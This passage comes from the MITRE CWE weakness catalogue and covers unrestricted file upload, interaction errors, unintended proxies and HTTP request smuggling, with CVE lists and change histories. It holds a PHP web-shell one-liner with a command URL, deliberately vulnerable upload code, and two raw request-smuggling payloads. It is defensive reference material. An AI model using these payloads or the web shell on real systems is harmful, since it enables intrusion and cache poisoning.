is retrieved (or discarded) by the server side code. In this example, the file is moved to a more permanent pictures/ directory. - - - - // Define the target location where the picture being - - - // uploaded is going to be saved. - $target = "pictures/" . basename($_FILES['uploadedfile']['name']); - - // Move the uploaded file to the new location. - if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target)){echo "The picture has been successfully uploaded.";}else{echo "There was an error uploading the picture, please try again.";} - - The problem with the above code is that there is no check regarding type of file being uploaded. Assuming that pictures/ is available in the web document root, an attacker could upload a file with the name: - - malicious.php - - Since this filename ends in ".php" it can be executed by the web server. In the contents of this uploaded file, the attacker could use: - - <?phpsystem($_GET['cmd']); - ?> - - Once this file has been installed, the attacker can enter arbitrary commands to execute using a URL such as: - - http://server.example.com/upload_dir/malicious.php?cmd=ls%20-l - - which runs the "ls -l" command - or any other type of command that the attacker wants to specify. - - - The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet. - - <form action="FileUploadServlet" method="post" enctype="multipart/form-data"> - Choose a file to upload:<input type="file" name="filename"/><br/><input type="submit" name="submit" value="Submit"/> - </form> - - When submitted the Java servlet's doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory. - - public class FileUploadServlet extends HttpServlet { - - ... - protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { - - response.setContentType("text/html");PrintWriter out = response.getWriter();String contentType = request.getContentType(); - // the starting position of the boundary headerint ind = contentType.indexOf("boundary=");String boundary = contentType.substring(ind+9); - String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value - // verify that content type is multipart form dataif (contentType != null && contentType.indexOf("multipart/form-data") != -1) { - - // extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf("\\"), pLine.lastIndexOf("\""));... - // output the file to the local upload directorytry { - BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {if (line.indexOf(boundary) == -1) {bw.write(line);bw.newLine();bw.flush();}} //end of for loopbw.close(); - - - } catch (IOException ex) {...}// output successful upload response HTML page - }// output unsuccessful upload response HTML pageelse{...} - }... - - } - - This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code. - Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use "../" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash. - - - - - CVE-2001-0901 - Web-based mail product stores ".shtml" attachments that could contain SSI - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0901 - - - CVE-2002-1841 - PHP upload does not restrict file types - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1841 - - - CVE-2005-1868 - upload and execution of .php file - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1868 - - - CVE-2005-1881 - upload file with dangerous extension - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1881 - - - CVE-2005-0254 - program does not restrict file types - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0254 - - - CVE-2004-2262 - improper type checking of uploaded files - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2262 - - - CVE-2006-4558 - Double "php" extension leaves an active php extension in the generated filename. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4558 - - - CVE-2006-6994 - ASP program allows upload of .asp files by bypassing client-side checks - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6994 - - - CVE-2005-3288 - ASP file upload - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3288 - - - CVE-2006-2428 - ASP file upload - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2428 - - - - File Processing - - - File or Directory - - - - Unrestricted File Upload - - - A3 - Malicious File Execution - CWE More Specific - - - ASCSM-CWE-434 - - - - - - - - - - - - - - - - This can have a chaining relationship with incomplete denylist / permissive allowlist errors when the product tries, but fails, to properly limit which types of files are allowed (CWE-183, CWE-184). - This can also overlap multiple interpretation errors for intermediaries, e.g. anti-virus products that do not remove or quarantine attachments with certain file extensions that can be processed by client systems. - - PHP applications are most targeted, but this likely applies to other languages that support file upload, as well as non-web technologies. ASP applications have also demonstrated this problem. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Applicable_Platforms, Functional_Areas, Likelihood_of_Exploit, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-02-16 - Critical - converted from Compound_Element to Weakness - - - CWE Content Team - MITRE - 2010-02-16 - updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Name, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships, Type, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated References, Relationship_Notes - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Potential_Mitigations - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations, Relationship_Notes - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Unrestricted File Upload - - - - An interaction error occurs when two entities have correct behavior when running independently of each other, but when they are integrated as components in a larger system or process, they introduce incorrect behaviors that may cause resultant weaknesses. - When a system or process combines multiple independent components, this often produces new, emergent behaviors at the system level. However, if the interactions between these components are not fully accounted for, some of the emergent behaviors can be incorrect or even insecure. - - - - - - - Interaction Error - - - Emergent Fault - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Integrity - Unexpected State - Varies by Context - - - - - Interaction Errors - - - - - - - The "Interaction Error" term, in CWE and elsewhere, is only intended to describe products that behave according to specification. When one or more of the products do not comply with specifications, then it is more likely to be API Abuse (CWE-227) or an interpretation conflict (CWE-436). This distinction can be blurred in real world scenarios, especially when "de facto" standards do not comply with specifications, or when there are no standards but there is widespread adoption. As a result, it can be difficult to distinguish these weaknesses during mapping and classification. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Name, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Alternate_Terms, Description, Name, References, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Type - - Interaction Errors - Interaction Error - Improper Interaction Between Multiple Entities - - - - Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B's state. - This is generally found in proxies, firewalls, anti-virus software, and other intermediary devices that monitor, allow, deny, or modify traffic based on how the client or server is expected to behave. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Other - Unexpected State - Varies by Context - - - - - The paper "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection" [REF-428] shows that OSes varied widely in how they manage unusual packets, which made it difficult or impossible for intrusion detection systems to properly detect certain attacker manipulations that took advantage of these OS differences. - - - Null characters have different interpretations in Perl and C, which have security consequences when Perl invokes C functions. Similar problems have been reported in ASP [REF-429] and PHP. - - - - - CVE-2005-1215 - Bypass filters or poison web cache using requests with multiple Content-Length headers, a non-standard behavior. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1215 - - - CVE-2002-0485 - Anti-virus product allows bypass via Content-Type and Content-Disposition headers that are mixed case, which are still processed by some clients. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0485 - - - CVE-2002-1978 - FTP clients sending a command with "PASV" in the argument can cause firewalls to misinterpret the server's error as a valid response, allowing filter bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1978 - - - CVE-2002-1979 - FTP clients sending a command with "PASV" in the argument can cause firewalls to misinterpret the server's error as a valid response, allowing filter bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1979 - - - CVE-2002-0637 - Virus product bypass with spaces between MIME header fields and the ":" separator, a non-standard message that is accepted by some clients. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0637 - - - CVE-2002-1777 - AV product detection bypass using inconsistency manipulation (file extension in MIME Content-Type vs. Content-Disposition field). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1777 - - - CVE-2005-3310 - CMS system allows uploads of files with GIF/JPG extensions, but if they contain HTML, Internet Explorer renders them as HTML instead of images. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3310 - - - CVE-2005-4260 - Interpretation conflict allows XSS via invalid "<" when a ">" is expected, which is treated as ">" by many web browsers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4260 - - - CVE-2005-4080 - Interpretation conflict (non-standard behavior) enables XSS because browser ignores invalid characters in the middle of tags. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4080 - - - - - Multiple Interpretation Error (MIE) - - - 27 - HTTP Response Smuggling - - - - - - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Applicable_Platforms, Description, Observed_Examples, Other_Notes, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - Multiple Interpretation Error (MIE) - - - - A product acts as an intermediary or monitor between two or more endpoints, but it does not have a complete model of an endpoint's features, behaviors, or state, potentially causing the product to perform incorrect actions based on this incomplete model. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Other - Unexpected State - Varies by Context - - - - - HTTP request smuggling is an attack against an intermediary such as a proxy. This attack works because the proxy expects the client to parse HTTP headers one way, but the client parses them differently. - - - Anti-virus products that reside on mail servers can suffer from this issue if they do not know how a mail client will handle a particular attachment. The product might treat an attachment type as safe, not knowing that the client's configuration treats it as executable. - - - - - Extra Unhandled Features - - - - This can be related to interaction errors, although in some cases, one of the endpoints is not performing correctly according to specification. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2010-12-13 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Extra Unhandled Features - - - - A's behavior or functionality changes with a new version of A, or a new environment, which is not known (or manageable) by B. - - - - - - - - - Functional change - - - - - Architecture and Design - - - Implementation - - - - - Other - Quality Degradation - Varies by Context - - - - - CVE-2002-1976 - Linux kernel 2.2 and above allow promiscuous mode using a different method than previous versions, and ifconfig is not aware of the new method (alternate path property). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1976 - - - CVE-2005-1711 - Product uses defunct method from another product that does not return an error code and allows detection avoidance. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1711 - - - CVE-2003-0411 - chain: Code was ported from a case-sensitive Unix platform to a case-insensitive Windows platform where filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype "text". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0411 - - - - - CHANGE Behavioral Change - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - Behavioral Change - - - - A software system that accepts path input in the form of internal dot ('file.ordir') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Internal Dot - 'file.ordir' - - - SFP16 - Path Traversal - - - - An improper attempt to remove the internal dots from the string could lead to CWE-181 (Incorrect Behavior Order: Validate Before Filter). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Path Issue - Internal Dot - 'file.ordir' - - - - A feature, API, or function does not perform according to its specification. - - - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Other - Quality Degradation - Varies by Context - - - - - CVE-2003-0187 - Program uses large timeouts on "undeserving" to compensate for inconsistency of support for linked lists. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0187 - - - CVE-2003-0465 - "strncpy" in Linux kernel acts different than libc on x86, leading to expected behavior difference - sort of a multiple interpretation error? - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0465 - - - CVE-2005-3265 - Buffer overflow in product stems the use of a third party library function that is expected to have internal protection against overflows, but doesn't. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3265 - - - - - Expected behavior violation - - - - The behavior of an application that is not consistent with the expectations of the developer may lead to incorrect use of the software. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Relevant_Properties, Theoretical_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relevant_Properties - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Description, Observed_Examples, Theoretical_Notes - - - - - The product receives a request, message, or directive from an upstream component, but the product does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the product's control sphere. This causes the product to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor. - - If an attacker cannot directly contact a target, but the product has access to the target, then the attacker can send a request to the product and have it be forwarded to the target. The request would appear to be coming from the product's system, not the attacker's system. As a result, the attacker can bypass access controls (such as firewalls) or hide the source of malicious requests, since the requests would not be coming directly from the attacker. - Since proxy functionality and message-forwarding often serve a legitimate purpose, this issue only becomes a vulnerability when: - - - The product runs with different privileges or on a different system, or otherwise has different levels of access than the upstream component; - The attacker is prevented from making the request directly to the target; and - The attacker can create a request that the proxy does not explicitly intend to be forwarded on the behalf of the requester. Such a request might point to an unexpected hostname, port number, hardware IP, or service. Or, the request might be sent to an allowed service, but the request could contain disallowed directives, commands, or resources. - - - - - - - - - - - - - - - - Confused Deputy - This weakness is sometimes referred to as the "Confused deputy" problem, in which an attacker misused the authority of one victim (the "confused deputy") when targeting another victim. - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Non-Repudiation - Access Control - Gain Privileges or Assume Identity - Hide Activities - Execute Unauthorized Code or Commands - - - - - Architecture and Design - Enforce the use of strong mutual authentication mechanism between the two parties. - - - Architecture and Design - Whenever a product is an intermediary or proxy for - transactions between two other components, the proxy core - should not drop the identity of the initiator of the - transaction. The immutability of the identity of the - initiator must be maintained and should be forwarded all the - way to the target. - - - - - - A SoC contains a microcontroller (running ring-3 - (least trusted ring) code), a Memory Mapped Input Output - (MMIO) mapped IP core (containing design-house secrets), - and a Direct Memory Access (DMA) controller, among several - other compute elements and peripherals. The SoC implements - access control to protect the registers in the IP core - (which registers store the design-house secrets) from - malicious, ring-3 (least trusted ring) code executing on - the microcontroller. The DMA controller, however, is not - blocked off from accessing the IP core for functional - reasons. - - - The code in ring-3 (least trusted ring) of the - microcontroller attempts to directly read the protected - registers in IP core through MMIO transactions. However, - this attempt is blocked due to the implemented access - control. Now, the microcontroller configures the DMA core - to transfer data from the protected registers to a memory - region that it has access to. The DMA core, which is - acting as an intermediary in this transaction, does not - preserve the identity of the microcontroller and, instead, - initiates a new transaction with its own identity. Since - the DMA core has access, the transaction (and hence, the - attack) is successful. - - The weakness here is that the intermediary or the - proxy agent did not ensure the immutability of the - identity of the microcontroller initiating the - transaction. - - The DMA - core forwards this transaction with the identity of the - code executing on the microcontroller, which is the - original initiator of the end-to-end transaction. Now the - transaction is blocked, as a result of forwarding the - identity of the true initiator which lacks the permission - to access the confidential MMIO mapped IP core. - - - - - - CVE-1999-0017 - FTP bounce attack. The design of the protocol allows an attacker to modify the PORT command to cause the FTP server to connect to other machines besides the attacker's. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0017 - - - CVE-1999-0168 - RPC portmapper could redirect service requests from an attacker to another entity, which thinks the requests came from the portmapper. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0168 - - - CVE-2005-0315 - FTP server does not ensure that the IP address in a PORT command is the same as the FTP user's session, allowing port scanning by proxy. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0315 - - - CVE-2002-1484 - Web server allows attackers to request a URL from another server, including other ports, which allows proxied scanning. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1484 - - - CVE-2004-2061 - CGI script accepts and retrieves incoming URLs. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2061 - - - CVE-2001-1484 - Bounce attack allows access to TFTP from trusted side. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1484 - - - CVE-2010-1637 - Web-based mail program allows internal network scanning using a modified POP3 port number. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1637 - - - CVE-2009-0037 - URL-downloading library automatically follows redirects to file:// and scp:// URLs - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0037 - - - - - Unintended proxy/intermediary - - - Proxied Trusted Channel - - - 32 - Routing Detour - - - - - - - - - - - - - - This weakness has a chaining relationship with CWE-668 (Exposure of Resource to Wrong Sphere) because the proxy effectively provides the attacker with access to the target's resources that the attacker cannot directly obtain. - This could possibly be considered as an emergent resource. - It could be argued that the "confused deputy" is a fundamental aspect of most vulnerabilities that require an active attacker. Even for common implementation issues such as buffer overflows, SQL injection, OS command injection, and path traversal, the vulnerable program already has the authorization to run code or access files. The vulnerability arises when the attacker causes the program to run unexpected code or access unexpected files. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Maintenance_Notes, Relationships, Taxonomy_Mappings, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Alternate_Terms, Applicable_Platforms, Description, Maintenance_Notes, Name, Observed_Examples, References, Relationship_Notes, Relationships, Theoretical_Notes, Type - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-14 - Per Intel Corporation suggestion, added language to be inclusive to hardware: updated Demonstrative_Examples, Description, Extended_Description, Applicable_Platforms, Potential_Mitigation, Common_Consequences, References - - - CWE Content Team - MITRE - 2020-08-20 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Potential_Mitigations, References, Relationships - - Unintended Proxy/Intermediary - - - - This weakness can be found at CWE-113. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Name - - DEPRECATED (Duplicate): HTTP response splitting - - - - When malformed or abnormal HTTP requests are interpreted by one or more entities in the data flow between the user and the web server, such as a proxy or firewall, they can be interpreted inconsistently, allowing the attacker to "smuggle" a request to one device without the other device being aware of it. - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Non-Repudiation - Access Control - Unexpected State - Hide Activities - Bypass Protection Mechanism - An attacker could create a request to exploit a number of weaknesses including 1) the request can trick the web server to associate a URL with another URLs webpage and caching the contents of the webpage (web cache poisoning attack), 2) the request can be structured to bypass the firewall protection mechanisms and gain unauthorized access to a web application, and 3) the request can invoke a script or a page that returns client credentials (similar to a Cross Site Scripting attack). - - - - - Implementation - Use a web server that employs a strict HTTP parsing procedure, such as Apache [REF-433]. - - - Implementation - Use only SSL communication. - - - Implementation - Terminate the client session after each request. - - - System Configuration - Turn all pages to non-cacheable. - - - - - In the following example, a malformed HTTP request is sent to a website that includes a proxy server and a web server with the intent of poisoning the cache to associate one webpage with another malicious webpage. - - POST http://www.website.com/foobar.html HTTP/1.1Host: www.website.comConnection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 0Content-Length: 44 - GET /poison.html HTTP/1.1Host: www.website.comBla: GET http://www.website.com/page_to_poison.html HTTP/1.1Host: www.website.comConnection: Keep-Alive - - When this request is sent to the proxy server, the proxy server parses the POST request in the first seven lines, and encounters the two "Content-Length" headers. The proxy server ignores the first header, so it assumes the request has a body of length 44 bytes. Therefore, it treats the data in the next three lines that contain exactly 44 bytes as the first request's body. The proxy then parses the last three lines which it treats as the client's second request. - The request is forwarded by the proxy server to the web server. Unlike the proxy, the web server uses the first "Content-Length" header and considers that the first POST request has no body, and the second request is the line with the first GET (note that the second GET is parsed by the web server as the value of the "Bla" header). - The requests the web server sees are "POST /foobar.html" and "GET /poison.html", so it sends back two responses with the contents of the "foobar.html" page and the "poison.html" page, respectively. The proxy matches these responses to the two requests it thinks were sent by the client "POST /foobar.html" and "GET /page_to_poison.html". If the response is cacheable, the proxy caches the contents of "poison.html" under the URL "page_to_poison.html", and the cache is poisoned! Any client requesting "page_to_poison.html" from the proxy would receive the "poison.html" page. - When a website includes both a proxy server and a web server some protection against this type of attack can be achieved by installing a web application firewall, or use a web server that includes a stricter HTTP parsing procedure or make all webpages non-cacheable. - Additionally, if a web application includes a Java servlet for processing requests, the servlet can check for multiple "Content-Length" headers and if they are found the servlet can return an error response thereby preventing the poison page to be cached, as shown below. - - protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { - - - // Set up response writer object - ...try { - - - // check for multiple content length headers - Enumeration contentLengthHeaders = request.getHeaders("Content-Length");int count = 0;while (contentLengthHeaders.hasMoreElements()) {count++;}if (count > 1) { - - - // output error response - - - }else { - - - // process request - - - } - - } catch (Exception ex) {...} - } - - - - In the following example, a malformed HTTP request is sent to a website that includes a web server with a firewall with the intent of bypassing the web server firewall to smuggle malicious code into the system.. - - POST /page.asp HTTP/1.1Host: www.website.comConnection: Keep-AliveContent-Length: 49223 - zzz...zzz ["z" x 49152]POST /page.asp HTTP/1.0Connection: Keep-AliveContent-Length: 30 - POST /page.asp HTTP/1.0Bla: POST /page.asp?cmd.exe HTTP/1.0Connection: Keep-Alive - - When this request is sent to the web server, the first POST request has a content-length of 49,223 bytes, and the firewall treats the line with 49,152 copies of "z" and the lines with an additional lines with 71 bytes as its body (49,152+71=49,223). The firewall then continues to parse what it thinks is the second request starting with the line with the third POST request. - Note that there is no CRLF after the "Bla: " header so the POST in the line is parsed as the value of the "Bla:" header. Although the line contains the pattern identified with a worm ("cmd.exe"), it is not blocked, since it is considered part of a header value. Therefore, "cmd.exe" is smuggled through the firewall. - When the request is passed through the firewall the web server the first request is ignored because the web server does not find an expected "Content-Type: application/x-www-form-urlencoded" header, and starts parsing the second request. - This second request has a content-length of 30 bytes, which is exactly the length of the next two lines up to the space after the "Bla:" header. And unlike the firewall, the web server processes the final POST as a separate third request and the "cmd.exe" worm is smuggled through the firewall to the web server. - To avoid this attack a Web server firewall product must be used that is designed to prevent this type of attack. - - - - - CVE-2005-2088 - Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2088 - - - CVE-2005-2089 - Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2089 - - - CVE-2005-2090 - Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2090 - - - CVE-2005-2091 - Web servers allow request smuggling via inconsistent 